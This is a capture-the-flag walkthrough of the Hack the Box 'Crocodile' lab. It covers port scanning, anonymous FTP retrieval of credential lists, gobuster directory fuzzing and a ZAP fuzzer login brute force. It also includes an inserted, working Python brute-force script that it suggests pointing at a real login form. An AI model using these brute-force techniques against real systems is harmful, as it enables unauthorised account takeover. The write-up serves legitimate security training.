Hack the Box — Crocodile
HTB Tags: #Linux #PHP #FTP
This is the third box in Tier 1, as part of the Starting Point series, with a focus on directory fuzzing and brute forcing logins on a Linux target. Let’s start by enumerating with the standard commands, ping and nmap.
ping
ping $IP -c 4
nmap
nmap -sC -sV -A $IP -p-
ftp
So we have an open FTP port that accepts anonymous logins. Let’s see what we get.
ftp $IP
Points to note here are the use of ls to list files and mget to download all the files. The [anpqy?]? prompt that mget shows for each file means All, No, Prompt off, Quit, Yes; answering a downloads everything without prompting again. You can use wildcards if required, such as * for all files.
Checking out the files, we see that they are a list of users and a list of passwords.
website
The website looks like any other; in this case the links all stay internal to the page.
gobuster
With nothing on the web pages themselves, let's check the folder structure of the site by directory fuzzing.
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
We find a few interesting folders, especially one called /dashboard. Browsing to it gives us a login page.
zap
OK, we have now found the login page. Let's start up OWASP ZAP and, using the built-in browser, submit a test username (test_user) and password.
Needless to say we failed to gain access, but the request and response have been recorded within ZAP.
Within ZAP we have the Request and Response tabs. These show the headers and body of what goes from client to server and back.
Here we see the actual HTML code for the failure:
In order to start the brute force attack, we need to use the built-in Fuzzer. Right-click within the Request tab and select Fuzz:
Firstly, remove any existing Fuzz locations by clicking Remove in the right-hand menu. Next we will add test_user as the first Fuzz location, so highlight it and click Add:
This opens the Payloads window. Click Add and we get the option to select a payload, with a drop-down menu for the different types.
In this case we already have the two files from the FTP server, so choose the File type, browse to the user list and click Add.
Now we see the payload we have just added.
Click on OK and then do the same for the password field. We should now be ready to start the Fuzzer.
Similar to Burp Suite, the Fuzzer will not tell you which login is correct, but by sorting on the Size Resp.Body column we will see a noticeable difference: every failed login renders the same error page, so those responses share one body size.
Here we see that the single response of 1258 bytes differs from all the other tasks that were run, which indicates the username:password pair we need to use.
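The same attack, scripted, as an added example that is not part of the original write-up or of ZAP itself: it posts every user/password combination from the two lists and, like the Size Resp.Body sort above, flags the pair whose response body length is the odd one out. The form field names (username/password), the /dashboard/login path and the two credential lists are assumptions for illustration, and the fake login server is constructed so the script runs offline; point brute_force() at the real form and its real field names instead.

```python
"""Brute-force a login form and spot the odd-one-out response by body size.

Added example, not the write-up author's code. Field names, endpoint path and
credential lists are assumptions; the local fake login server is constructed
so the whole thing runs offline.
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-ins for the user and password files pulled from FTP.
USERS = ["alice", "bob", "carol", "dave"]
PASSWORDS = ["winter2023", "letmein", "hunter2"]
VALID = ("carol", "hunter2")  # constructed: the one pair the fake login accepts


def attempt_login(url, username, password, user_field="username", pass_field="password"):
    """POST one credential pair as a URL-encoded form; return (status, body length)."""
    data = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a body worth measuring
        return err.code, len(err.read())


def brute_force(url, users, passwords, **fields):
    """Try every user x password combination; return {(user, pw): body_length}."""
    return {(u, p): attempt_login(url, u, p, **fields)[1] for u in users for p in passwords}


def find_outliers(sizes):
    """Return the pairs whose body length differs from the most common length.

    Failed logins render the same error page, so their sizes cluster; the
    success renders something else. This is the Size Resp.Body signal.
    """
    common, _ = Counter(sizes.values()).most_common(1)[0]
    return [pair for pair, size in sizes.items() if size != common]


class FakeLogin(BaseHTTPRequestHandler):
    """Constructed login endpoint: one fixed error page, a different page on success."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        if creds == VALID:
            body = b"<html><body><h1>Server Manager Dashboard</h1></body></html>"
        else:
            body = b"<html><body><p>Incorrect username or password.</p></body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging during the demo
        pass


def demo():
    """Start the fake login on an ephemeral port, run the attack, return the hits."""
    server = HTTPServer(("127.0.0.1", 0), FakeLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{server.server_port}/dashboard/login"
        return find_outliers(brute_force(url, USERS, PASSWORDS))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for user, pw in demo():
        print(f"{user}:{pw}")
```

The outlier test only works while failures dominate the result set; with very short lists, or a form that varies its error message (for instance echoing the username back), compare on status code or a redirect Location header instead of raw body length.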
Once we sign in, we are given a server manager dashboard with the flag showing front and centre!
summary
A great little challenge, which covers brute forcing a login form from ZAP or Burp Suite. If you get some time, try out hydra to get the correct password.